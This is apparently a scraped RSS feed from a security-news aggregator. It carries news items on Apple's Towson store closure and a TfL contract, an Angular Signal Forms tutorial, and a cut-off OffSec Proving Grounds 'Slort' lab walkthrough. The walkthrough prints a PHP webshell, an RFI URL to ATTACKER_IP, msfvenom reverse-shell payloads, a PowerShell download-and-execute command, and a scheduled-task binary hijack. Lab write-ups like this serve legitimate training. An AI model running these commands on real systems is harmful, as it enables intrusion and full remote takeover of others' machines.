<link>https://tsecurity.de/de/3607508/ios-mac-os/baltimore-mayor-pressures-apple-over-towson-store-closure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607508/ios-mac-os/baltimore-mayor-pressures-apple-over-towson-store-closure/</guid>
<pubDate>Thu, 18 Jun 2026 13:19:11 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Baltimore Mayor Brandon M. Scott has added fresh pressure on Apple over its decision to close the Apple Towson Town Center store, which became the first unionized Apple Store in the United States.



Apple plans to permanently close the Towson store on June 20, along with two other retail locations. The decision has drawn criticism from the IAM Union, which says Apple has not offered Towson employees the same relocation options given to workers at non-union stores.




https://twitter.com/MayorBMScott/status/2066967338851651817




Apple has said its agreement with the union only requires transfer offers within 50 miles of the Towson store, while severance remains available for workers who cannot be relocated. The company has also said it has no plans to open another store within that area.



Mayor Scott shared his support for the workers in a post on X, saying Apple’s decision affects both employees and the wider community around Towson. He argued that closing the store without a replacement pushes important services farther away from local customers.



The mayor also urged Apple to give Towson workers the same opportunities offered to employees at non-union stores, adding that he will support their fight for fair treatment.



IAM International President Brian Bryant thanked Mayor Scott for his support and again called on Apple to act before the store closes.]]></content:encoded>
</item>
<item>
<title><![CDATA[Transport for London keeps Capita behind wheel of road charging ops in £912M extension]]></title>
<description><![CDATA[Replacement deal now expected in mid-2029 as body says safe transition will take at least five years]]></description>
<link>https://tsecurity.de/de/3607288/it-nachrichten/transport-for-london-keeps-capita-behind-wheel-of-road-charging-ops-in-912m-extension/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607288/it-nachrichten/transport-for-london-keeps-capita-behind-wheel-of-road-charging-ops-in-912m-extension/</guid>
<pubDate>Thu, 18 Jun 2026 12:01:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Replacement deal now expected in mid-2029 as body says safe transition will take at least five years]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a signal-first form in Angular]]></title>
<description><![CDATA[Understanding a reactivity model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained i...]]></description>
<link>https://tsecurity.de/de/3607185/ai-nachrichten/building-a-signal-first-form-in-angular/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607185/ai-nachrichten/building-a-signal-first-form-in-angular/</guid>
<pubDate>Thu, 18 Jun 2026 11:18:46 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Understanding a <a href="https://www.infoworld.com/article/2335507/reactive-javascript-the-evolution-of-front-end-architecture.html">reactivity</a> model in the abstract is useful, but it is ultimately incomplete without seeing how it shapes real application code. Concepts such as state, derivation, and explicit dependencies only become meaningful when they influence how forms are built, validated, and maintained in practice.</p>



<p>In two previous articles, “<a href="https://www.infoworld.com/article/4171858/angular-signal-forms-from-event-pipelines-to-signal-driven-state.html">Angular Signal Forms: From event pipelines to signal-driven state</a>” and “<a href="https://www.infoworld.com/article/4180890/angular-signals-explained-how-pull-based-reactivity-changes-how-we-model-state.html">Angular Signals explained: How pull-based reactivity changes how we model state</a>,” we reframed form behavior as a state-driven problem and examined Angular Signals as a pull-based reactivity model well-suited to that kind of work. The natural next step is to apply those ideas to an actual Angular form and observe how the architecture changes when state becomes the primary concern.</p>



<p>This article focuses on a concrete example: a modest but realistic registration form. Rather than introducing new concepts, the goal here is to make earlier ideas tangible. We will see how a signal-backed model reshapes validation, interaction state, and submission logic, and how much coordination logic simply disappears when form behavior is expressed declaratively.</p>



<p>The focus here is not on novelty or completeness, but on making the underlying ideas easier to reason about. By walking through a signal-first form from model definition to submission, we can evaluate whether this approach truly reduces complexity and where it introduces new trade-offs that teams should understand before adopting it more broadly.</p>



<h2 class="wp-block-heading"><a></a>Implementing a signal-first registration form</h2>



<p>With the conceptual groundwork in place, we can now turn theory into a concrete implementation. In this section, we will build a fully working registration form using Angular’s Signal Forms API. This example is deliberately modest in scope, but it is designed to serve as the foundation for the rest of the series. Each subsequent article will extend this same example rather than introducing a new one.</p>



<p>The form collects an email address, a password, a confirmation password, and explicit acceptance of terms. While simple on the surface, this structure allows us to explore field-level validation, cross-field constraints, interaction state, and submission behavior, all without reverting to event-driven form logic.</p>



<h3 class="wp-block-heading"><a></a>Project setup and structure</h3>



<p>The example assumes a standard Angular application created with the Angular CLI and configured to use Signals (Angular 17+). The Signal Forms APIs (Angular 21+) live under @angular/forms/signals, which must be explicitly imported.</p>



<p><a href="https://github.com/sonukapoor/angular-signal-forms">https://github.com/sonukapoor/angular-signal-forms</a></p>



<p>The folder structure is intentionally conservative:</p>



<p>src/<br>  app/<br>    registration/<br>      registration.component.ts<br>      registration.component.html<br>      registration.model.ts</p>



<p>Separating the model from the component keeps form state independent of presentation. This becomes increasingly valuable as the form grows or is reused across multiple components.</p>



<h3 class="wp-block-heading"><a></a>Defining the form model</h3>



<p>We begin by defining the shape of the data that the form collects. This is a plain TypeScript interface with no Angular dependencies. Treating the form model as a simple data structure reinforces the idea that the form’s values are just state.</p>



<pre class="wp-block-code"><code>// registration.model.ts
export interface RegistrationData {
  email: string;
  password: string;
  confirmPassword: string;
  acceptedTerms: boolean;
}
</code></pre>



<p>This interface mirrors what would typically be sent to a back-end API. There is no duplication of state, no separate “form value” object, and no mapping required at submission time.</p>



<h3 class="wp-block-heading"><a></a>Creating the signal-backed form</h3>



<p>The form itself is created in the component using a writable signal as the source of truth. The <code>form()</code> function attaches form semantics validation, field state, and submission to that signal.</p>



<pre class="wp-block-code"><code>// registration.component.ts
import { CommonModule } from "@angular/common";
import { Component, signal } from "@angular/core";
import {
  email,
  form,
  FormField,
  required,
  submit,
} from "@angular/forms/signals";
import { RegistrationData } from "./registration.model";

@Component({
  selector: "app-registration",
  imports: [FormField, CommonModule],
  templateUrl: "./registration.html",
  styleUrl: "./registration.css",
})
export class Registration {
  readonly model = signal<registrationdata>({
    email: "",
    password: "",
    confirmPassword: "",
    acceptedTerms: false,
  });

  readonly registrationForm = form(this.model, (schema) =&gt; {
    required(schema.email, { message: "Email is required" });
    email(schema.email, { message: "Enter a valid email address" });

    required(schema.password, { message: "Password is required" });
    required(schema.confirmPassword, {
      message: "Please confirm your password",
    });

    required(schema.acceptedTerms, {
      message: "You must accept the terms to continue",
    });
  });

  async onSubmit(event?: Event) {
    event?.preventDefault();

    await submit(this.registrationForm, (value) =&gt; {
      console.log(value());
      // Mock Server Call
      return Promise.resolve([
        {
          kind: "EmailAlreadyExists",
          field: this.registrationForm.email,
          error: { kind: "server", message: "Email already taken" },
        },
      ]);
    });
  }
}
</registrationdata></code></pre>



<p>Several design decisions are worth noting.</p>



<p>First, the model signal is defined as read-only. All mutations to the model occur through form bindings, not ad hoc assignments in the component. This keeps the component declarative and avoids the temptation to manipulate form state imperatively.</p>



<p>Second, validation is declared in one place. The schema function describes constraints on the model without introducing control trees, validator arrays, or observable pipelines. Angular takes responsibility for re-running validation whenever the model changes.</p>



<p>Finally, submission logic is explicit. The <code>submit()</code> helper ensures that the form is valid before invoking the callback, and it passes the current model value directly. There is no need to check flags or manually extract values.</p>



<h3 class="wp-block-heading"><a></a>Binding the form to the template</h3>



<p>With the form defined, the next step is to bind it to the template. Signal Forms provide the <code>[formField]</code> directive, which connects an input element directly to a field in the form schema.</p>



<pre class="wp-block-code"><code><!-- registration.component.html -->

  <div>
    <label>Email</label>
    

    @if (
      registrationForm.email().invalid() &amp;&amp; registrationForm.email().touched()
    ) {
      <p class="error">
        {{ registrationForm.email().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Password</label>
    

    @if (
      registrationForm.password().invalid() &amp;&amp;
      registrationForm.password().touched()
    ) {
      <p class="error">
        {{ registrationForm.password().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>Confirm Password</label>
    

    @if (
      registrationForm.confirmPassword().invalid() &amp;&amp;
      registrationForm.confirmPassword().touched()
    ) {
      <p class="error">
        {{ registrationForm.confirmPassword().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    <label>
      
      I accept the terms and conditions
    </label>

    @if (
      registrationForm.acceptedTerms().invalid() &amp;&amp;
      registrationForm.acceptedTerms().touched()
    ) {
      <p class="error">
        {{ registrationForm.acceptedTerms().errors()[0].message }}
      </p>
    }
  </div>

  <div>
    @if (registrationForm().errors().length &gt; 0) {
      <div class="error">
        @for (error of registrationForm().errors(); track error.message) {
          <p>{{ error.kind }}</p>
        }
      </div>
    }
  </div>

  <button type="submit">
    Register
  </button>

</code></pre>



<p>What stands out here is the absence of indirection. Each input binds directly to a field. Validation state is accessed through signals such as <code>invalid()</code> and <code>touched()</code>. Error messages are read from a structured error object, not reconstructed manually.</p>



<p>This template contains no subscriptions, no async pipes, and no event handlers for value changes. The UI simply reflects the current form state.</p>



<h3 class="wp-block-heading"><a></a>Interaction state and user experience</h3>



<p>One of the common criticisms of declarative form models is that they obscure user interaction logic. Signal Forms address this directly by exposing interaction metadata as signals.</p>



<p>The <code>touched()</code> signal determines whether a field has been interacted with. By combining it with <code>invalid()</code>, we control when validation messages appear. This logic remains purely declarative: the template describes when errors should be visible, and Angular ensures the signals stay up-to-date.</p>



<p>The disabled state of the submit button is derived from <code>registrationForm.invalid()</code>. There is no need to manually enable or disable it in response to events. If the form becomes valid, the button is enabled automatically.</p>



<h3 class="wp-block-heading"><a></a>Why this scales</h3>



<p>Even at this early stage, several advantages of a signal-first form model are apparent. The form’s behavior is expressed in terms of state and derivation, not events. The model, validation rules, and UI bindings are clearly separated. There is no duplication of logic between the component and the template.</p>



<p>As the form grows, this structure holds. Additional fields introduce additional schema entries and template bindings, not new subscription logic. Cross-field validation can be added declaratively. Asynchronous validation and persistence can be layered on without rewriting the core model.</p>



<p>Most importantly, the form remains inspectable. At any point during execution, the model signal reflects the current state of the form. Derived state validity, errors, and UI flags can be understood by reading the code, not by tracing runtime behavior.</p>



<h2 class="wp-block-heading"><a></a>What we did not solve yet (and why)</h2>



<p>At this stage, it would be easy to walk away with the impression that Signal Forms eliminates most of the hard problems associated with form handling. That impression would be misleading. What we have built so far is intentionally incomplete, not because the approach falls short, but because introducing too much too early obscures the value of the underlying model.</p>



<p>One area we have deliberately postponed is cross-field validation that expresses richer business rules. Many real-world forms depend on relationships between fields rather than isolated constraints. Password confirmation is a familiar example, but more complex scenarios quickly arise in enterprise applications. While Signal Forms support these patterns, introducing them before establishing a clear understanding of derived state risks turns validation back into an imperative exercise rather than a declarative one.</p>



<p>We have also avoided asynchronous validation. Server-backed checks introduce latency, partial failure, cancellation, and race conditions. These are not trivial concerns, and treating them casually often leads to subtle bugs and confusing user experiences. Although Signal Forms provide the necessary hooks to model asynchronous behavior, doing so responsibly requires a careful discussion of pending state, effects, and life-cycle boundaries. That discussion belongs in its own article.</p>



<p>Another omission is persistence and synchronization. Many forms need to autosave drafts, synchronize state with local storage, or react to changes by triggering external side effects. These behaviors are not part of the form state itself; they are consequences of state changes. Treating them as such is essential to keeping the architecture comprehensible. Introducing persistence too early would blur the distinction between state and reaction that this article has worked to establish.</p>



<p>Finally, this article has not addressed migration and interoperability. Few teams are starting from a blank slate. Most will adopt Signal Forms incrementally within applications that already rely on reactive forms or template-driven forms. Hybrid approaches, bridging strategies, and gradual refactors are all critical topics, but they presuppose familiarity with both paradigms. Addressing migration before establishing a solid signal-first mental model would undermine that foundation.</p>



<p>These omissions are intentional. A form architecture that tries to do everything at once often ends up doing nothing clearly. By focusing on the core ideas of state, derivation, and declarative validation, we create a base that can absorb additional complexity without collapsing under it.</p>



<h2 class="wp-block-heading"><a></a>Signal Forms in the context of Angular’s evolution</h2>



<p>To fully appreciate Signal Forms, it helps to step back and view them not as an isolated feature, but as part of a broader shift in Angular’s design philosophy.</p>



<p>For much of its history, Angular emphasized declarative templates paired with imperative coordination in component classes. RxJS became the backbone of that coordination, providing a powerful abstraction for handling asynchronous workflows, user input, and external events. This model scaled well, but it also encouraged developers to express state indirectly through streams and subscriptions.</p>



<p>Signals represent a deliberate recalibration. They re-center Angular’s reactivity model around state and derivation, rather than events and emissions. This shift is visible across the framework: in component inputs, change detection, and now forms. Signal Forms are not an attempt to replace everything that came before; they are an attempt to make the most common use case, modeling and deriving state, simpler and more explicit.</p>



<p>Framed this way, the design of Signal Forms aligns more closely with state-driven form behavior. The requirement to start with a model signal reflects the idea that the state should have a single, inspectable source of truth. Schema-based validation aligns with the notion that constraints are properties of state, not behaviors triggered by events. Field state exposed as signals reinforces the idea that validity, errors, and interaction metadata are derived values that should be read, not managed.</p>



<p>It is also worth noting that Signal Forms do <em>not</em> attempt to abstract away form behavior. They do not hide form state behind opaque classes or life-cycle hooks. They do not require developers to think in terms of control hierarchies or subscription graphs. Instead, they expose form behavior directly, making it easier to reason about how values, validation, and UI feedback relate to one another.</p>



<p>This approach aligns closely with other recent changes in Angular, including the introduction of modern template control flow and a stronger emphasis on explicit data dependencies. Together, these features point toward a framework that favors clarity over indirection and composition over orchestration.</p>



<p>Importantly, Signal Forms are still evolving. Their APIs may change, and their surface area will almost certainly expand. That is precisely why grounding them in first principles matters. Developers who understand <em>why</em> Signal Forms work the way they do will be far better equipped to adapt as the APIs mature.</p>



<p>This article has intentionally avoided duplicating documentation or enumerating every available feature. Instead, it has focused on establishing a conceptual framework that makes the official APIs feel intuitive rather than surprising. When viewed this way, Signal Forms are not a new way to write forms; they are a clearer expression of what forms have always been.</p>



<h2 class="wp-block-heading"><a></a>A new way to think about forms</h2>



<p>Building the registration form in this article reveals a quiet but important shift. The reduction in complexity does not come from fewer features or simpler requirements. It comes from expressing form behavior in terms of state and derivation rather than orchestration and reaction.</p>



<p>By treating the data model as the single source of truth, validation rules as declarative constraints, and UI behavior as derived from current conditions, much of the coordination logic that typically surrounds forms becomes unnecessary. There are fewer subscriptions to manage, fewer flags to synchronize, and fewer life-cycle concerns to reason about. Form behavior becomes easier to inspect because it is visible directly in the relationships between values.</p>



<p>This approach does not eliminate the hard problems associated with forms. Asynchronous validation, persistence, and interoperability with existing Angular Forms APIs still require careful design. What changes is where that complexity lives. Instead of being interwoven with state representation, those concerns are layered explicitly on top of a clear foundation.</p>



<p>Signal-first forms are not a universal replacement for existing patterns, nor are they a shortcut to simpler applications. They are, however, a strong example of how aligning APIs with first principles can reduce cognitive overhead and improve maintainability over time. For teams building large, state-heavy forms, this alignment can make the difference between code that merely works and code that continues to evolve without friction.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…]]></title>
<description><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG PlaySlort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080...]]></description>
<link>https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG Play</h3><p>Slort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080 runs an XAMPP stack hosting a custom PHP application that passes the ?page= GET parameter directly into include() it with no sanitisation. With allow_url_include enabled — a dangerous PHP setting common in old XAMPP installations — pointing the parameter at an attacker-controlled URL causes the server to fetch and execute arbitrary PHP. That gets a Meterpreter shell as rupert. From there, standard automated enumeration turns up nothing. Manual filesystem exploration finds the answer: C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator. icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cFOBI7_c-J62tSPE1njH_g.png"></figure><p><strong>Attack Path:</strong> ffuf → /site/index.php?page= (RFI via allow_url_include) → Meterpreter as rupert → C:\Backup\TFTP.EXE (world-writable, scheduled as Administrator) → Meterpreter as SLORT\Administrator</p><p><strong>Platform:</strong> OffSec Proving Grounds Play<br> <strong>Machine:</strong> Slort<br> <strong>Difficulty:</strong> Intermediate<br> <strong>OS:</strong> Windows<br> <strong>Date:</strong> 20XX-XX-XX</p><h3>Table of Contents</h3><pre>1. Reconnaissance<br>   1.1  Nmap Port Scan — Fast Pass<br>   1.2  Nmap Port Scan — Full Range<br>   1.3  Dead-End Service Checks (FTP, SMB, MariaDB)<br>2. Web Enumeration<br>   2.1  Directory Busting — Port 8080<br>   2.2  Enumerating /site/<br>   2.3  Identifying the File Inclusion Parameter<br>3. Initial Access — RFI via PHP allow_url_include<br>   3.1  Confirming LFI via Path Traversal<br>   3.2  Confirming RFI and Deploying a PHP Webshell<br>   3.3  Upgrading to an Interactive Meterpreter Session<br>4. Post-Exploitation Enumeration<br>   4.1  Token Privileges<br>   4.2  Group Membership<br>   4.3  Auto-Starting Services<br>   4.4  Scheduled Tasks<br>   4.5  Registry Run Keys<br>   4.6  Manual Filesystem Exploration — C:\Backup<br>5. Privilege Escalation — Writable Scheduled Task Binary<br>   5.1  Confirming Write Access with icacls<br>   5.2  Generating the Replacement Payload<br>   5.3  Overwriting TFTP.EXE<br>   5.4  Catching the Administrator Session<br>6. Proof of Compromise<br>7. Vulnerability Summary<br>8. Defense &amp; Mitigation<br>   8.1  Remote File Inclusion — PHP allow_url_include Enabled<br>   8.2  User Input Passed to include() Without Sanitisation<br>   8.3  World-Writable Scheduled Task Binary</pre><h3>1. Reconnaissance</h3><h3>1.1 Nmap Port Scan — Fast Pass</h3><pre>nmap -Pn -sC -sV -F &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>Port      State  Service   Version<br>--------  -----  --------  -------------------------------------------------<br>21/tcp    open   FTP       FileZilla 0.9.41 beta<br>135/tcp   open   msrpc     Microsoft Windows RPC<br>139/tcp   open   netbios   Microsoft Windows netbios-ssn<br>445/tcp   open   SMB       Microsoft Windows SMB (signing not required)<br>3306/tcp  open   mysql     MariaDB — unauthorized (local connections only)<br>8080/tcp  open   HTTP      Apache 2.4.43, PHP 7.4.6, OpenSSL 1.1.1g (Win64 XAMPP)</pre><p>The port 8080 finding is the most significant. XAMPP is a self-contained PHP development stack — the combination of Apache, PHP, MySQL, and sometimes phpMyAdmin — and old versions are known to ship with dangerous default settings, such as allow_url_include enabled. MariaDB is reachable on 3306, but the banner says "host not allowed", meaning it is accepting local connections only. SMB message signing is not required, which is noted for completeness. FTP is running a very old FileZilla beta — worth probing for anonymous login before moving on.</p><h3>1.2 Nmap Port Scan — Full Range</h3><pre>nmap -Pn -p- --min-rate 5000 &lt;TARGET_IP&gt;</pre><p><strong>Additional ports found:</strong></p><pre>49665/tcp  open  msrpc<br>49666/tcp  open  msrpc</pre><p>Both are ephemeral Windows RPC ports assigned dynamically at startup. They provide no additional attack surface here. The full scan confirms that the fast pass covered the meaningful services.</p><h3>1.3 Dead-End Service Checks</h3><p>Three quick checks before committing to the web server:</p><pre>ftp &lt;TARGET_IP&gt;<br># Username: anonymous<br># Password: anonymous</pre><p>Anonymous FTP login was rejected. FileZilla 0.9.41 beta is an old version, but anonymous access was not enabled on this instance.</p><pre>smbclient -L //&lt;TARGET_IP&gt; -N</pre><pre>NT_STATUS_ACCESS_DENIED</pre><p>Null session authentication is blocked. No SMB shares are enumerable without credentials.</p><pre>mysql -h &lt;TARGET_IP&gt; -u root --password=''</pre><p>Connection refused — MariaDB is bound to localhost only, consistent with the Nmap banner. XAMPP’s default MariaDB configuration does not expose the database externally, and that default was not changed here.</p><p>All three dead ends confirmed in under two minutes. Port 8080 is the target.</p><h3>2. Web Enumeration</h3><h3>2.1 Directory Busting — Port 8080</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path          Status  Notes<br>-----------   ------  ----------------------------------------<br>/site         301     Custom application<br>/phpmyadmin   403     Installed but access restricted<br>/dashboard    301     Default XAMPP dashboard</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/1*A00HueMeJfRO72kWjG5VJA.png"></figure><p>/site/ is the non-standard result. phpMyAdmin is present and blocked from external access — a useful note if credentials surface later. The XAMPP dashboard is the default content. Everything that matters is in /site/.</p><h3>2.2 Enumerating /site/</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/site/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path        Status  Size   Notes<br>----------  ------  -----  ------------------------------------------<br>admin.php   200     3998   Present<br>controllers 200     984    Application MVC structure<br>css         301     —      Static assets<br>fonts       301     —      Static assets<br>images      301     —      Static assets<br>index.php   301     27     Tiny body — redirect script<br>js          301     —      Static assets</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/919/1*yqYhMYXjCEv4psp5eszy9g.png"></figure><p>index.php returning a 301 with only 27 bytes in the response body is the key finding. That response size is consistent with a PHP script containing nothing but a header("Location: ...") redirect — the entire file is a single redirect, and it is almost certainly redirecting to itself with a ?page= parameter appended. That is the classic signature of a file inclusion handler.</p><h3>2.3 Identifying the File Inclusion Parameter</h3><pre>curl -I http://&lt;TARGET_IP&gt;:8080/site/index.php</pre><p><strong>Response header:</strong></p><pre>HTTP/1.1 301 Moved Permanently<br>Location: index.php?page=main.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/830/1*rbGwMu5xXqNP57_HpxpBSA.png"></figure><p>Confirmed. The application uses ?page= to determine which PHP file to include. The redirect destination is main.php, meaning the application's logic is to include whatever file is named in the page parameter. If that parameter is passed unsanitised into PHP's include(), it is a file inclusion vulnerability. The next step is confirming how far it can be pushed.</p><h3>3. Initial Access — RFI via PHP allow_url_include</h3><h3>3.1 Confirming LFI via Path Traversal</h3><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=../../../../windows/system32/drivers/etc/hosts"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/918/1*afnt8HGDVvqAaOwZaahBMw.png"></figure><p><strong>Output:</strong> The Windows hosts file content was returned verbatim in the response body.</p><p>LFI is confirmed. The application passes $_GET['page'] directly into include() with no path restriction and no input sanitisation. The web root sits at C:\xampp\htdocs\site\, so four levels of ../ traversal climb to the filesystem root, and the hosts file path resolves cleanly from there.</p><p>LFI alone enables arbitrary file reads — configuration files, credential stores, source code. The more powerful technique is RFI: if PHP’s allow_url_include directive is enabled, include() can fetch and execute code from a remote URL entirely under attacker control.</p><h3>3.2 Confirming RFI and Deploying a PHP Webshell</h3><p>Create a minimal PHP webshell locally:</p><pre>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; ~/cmd.php</pre><p>Serve it over HTTP from the attacker's machine:</p><pre>python3 -m http.server 8000</pre><p>Trigger remote inclusion and confirm RCE:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=whoami"</pre><p><strong>Output:</strong></p><pre>slort\rupert</pre><p>RFI confirmed. allow_url_include is enabled on this XAMPP installation. PHP fetched cmd.php from the attacker's machine, executed it as server-side code, and ran whoami via system(), and returned the result. Remote code execution as rupert is established.</p><blockquote><em>💡 </em><em>allow_url_include was deprecated in PHP 7.4 and removed in PHP 8.0. Its presence here on PHP 7.4.6 confirms this is an unmaintained, default XAMPP installation where the dangerous default was never corrected.</em></blockquote><h3>3.3 Upgrading to an Interactive Meterpreter Session</h3><p>A webshell requires a separate HTTP request for every command and leaves a log entry for every action. An interactive reverse shell provides a persistent, stateful terminal session.</p><p>Generate a stageless Windows Meterpreter payload:</p><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=4444 \<br>     -f exe -o shell.exe</pre><p>A <strong>stageless</strong> payload (meterpreter_reverse_tcp) embeds the full Meterpreter agent in a single executable. A <strong>staged</strong> payload (meterpreter/reverse_tcp) sends a small stager first, which then downloads the agent in a second connection. Stageless is more reliable — one connection, full functionality from the moment it lands. If the second connection of a staged payload is interrupted by a firewall or timing issue, the session is lost.</p><p>Serve the payload and set up the Metasploit handler:</p><pre># Metasploit handler<br>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 4444<br>run</pre><p>Deliver the payload via the webshell using a base64-encoded PowerShell command. Base64 encoding the entire PowerShell command with -enc sidesteps character escaping issues that arise when special characters — quotes, semicolons, dollar signs, pipes — must survive intact through URL encoding, PHP's system(), and PowerShell's own parser. A single base64 token collapses all of that complexity.</p><pre># Generate the base64-encoded download-and-execute command<br>powershell -c "IEX((New-Object Net.WebClient).DownloadString('http://&lt;ATTACKER_IP&gt;:8000/shell.exe'))"<br># Base64-encode the above in UTF-16LE for PowerShell -enc</pre><p>Trigger via the webshell:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=powershell+-enc+&lt;BASE64_PAYLOAD&gt;"</pre><p><strong>Meterpreter session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\rupert</pre><p>Interactive session as rupert. Standard post-exploitation enumeration follows.</p><h3>4. Post-Exploitation Enumeration</h3><h3>4.1 Token Privileges</h3><pre>whoami /priv</pre><p>Only default low-privilege user rights are present. There is no SeImpersonatePrivilege, SeDebugPrivilege, or SeBackupPrivilege. The fast paths — PrintSpoofer, GodPotato, or token impersonation attacks — are not available here.</p><h3>4.2 Group Membership</h3><pre>whoami /groups</pre><p>rupert is a member of the standard user groups only: Everyone, Users, and Authenticated Users. No Administrators, Backup Operators, Remote Management Users, or Remote Desktop Users membership. No group-based escalation path.</p><h3>4.3 Auto-Starting Services</h3><pre>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"</pre><p>Only VMware Tools services returned, all with properly quoted executable paths. No unquoted service path vulnerabilities, and no third-party service binaries to check for weak ACLs.</p><h3>4.4 Scheduled Tasks</h3><pre>schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"</pre><p>Only standard Windows system maintenance tasks. No custom tasks with writable executables or elevated execution contexts visible through automated enumeration.</p><h3>4.5 Registry Run Keys</h3><pre>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br>reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><p>Only VMware Tools and Windows Security Health entries in both keys. No custom or administrator-added run key entries.</p><h3>4.6 Manual Filesystem Exploration — C:\Backup</h3><p>Automated enumeration produced nothing. Manual exploration of non-standard directories is the next step — anything outside C:\Windows\ and C:\Program Files\ that an administrator created deliberately is worth reading.</p><pre>dir C:\Backup</pre><pre>TFTP.EXE<br>info.txt</pre><pre>type C:\Backup\info.txt</pre><p><strong>Output:</strong></p><pre>Run every 5 minutes:<br>C:\Backup\TFTP.EXE -i &lt;REMOTE_HOST&gt; get backup.txt</pre><p>A scheduled task invoking TFTP.EXE on a five-minute interval to pull a backup file from a remote host. Two questions determine whether this is exploitable: what account runs this task, and whether the binary is writable by rupert?</p><blockquote><em>💡 Automated scripts follow predefined patterns. </em><em>C:\Backup is not part of any default Windows installation — an administrator created it and placed files there deliberately. Non-standard directories created by administrators are consistently worth manual inspection.</em></blockquote><h3>5. Privilege Escalation — Writable Scheduled Task Binary</h3><h3>5.1 Confirming Write Access with icacls</h3><pre>icacls C:\Backup\TFTP.EXE</pre><p><strong>Output:</strong></p><pre>C:\Backup\TFTP.EXE  BUILTIN\Users:(I)(F)<br>                    NT AUTHORITY\SYSTEM:(I)(F)<br>                    BUILTIN\Administrators:(I)(F)</pre><p>BUILTIN\Users:(I)(F) — Every authenticated user on the system has inherited full control over this file. (F) means full control: read, write, execute, delete, and permission modification. (I) means the permission was inherited from the parent directory's ACL rather than set explicitly on the file itself. rupert is a member of BUILTIN\Users. The binary can be overwritten entirely.</p><p>The account that runs the scheduled task is Administrator. Replacing the binary with a Meterpreter payload means the next time the scheduler fires, it executes the payload as Administrator — a direct path to a privileged session.</p><h3>5.2 Generating the Replacement Payload</h3><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=7777 \<br>     -f exe -o tftp.exe</pre><p>Port 7777 is used to keep this listener separate from the existing session on port 4444. The output file is named tftp.exe to match the original binary — while the filename does not affect execution, it keeps the operation clean and avoids any hypothetical filename-based integrity checks.</p><p>Set up a second Metasploit handler:</p><pre>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 7777<br>run</pre><h3>5.3 Overwriting TFTP.EXE</h3><p>From the existing rupert Meterpreter session, download the payload directly to the target path using PowerShell's DownloadFile method:</p><pre>powershell -c "(New-Object 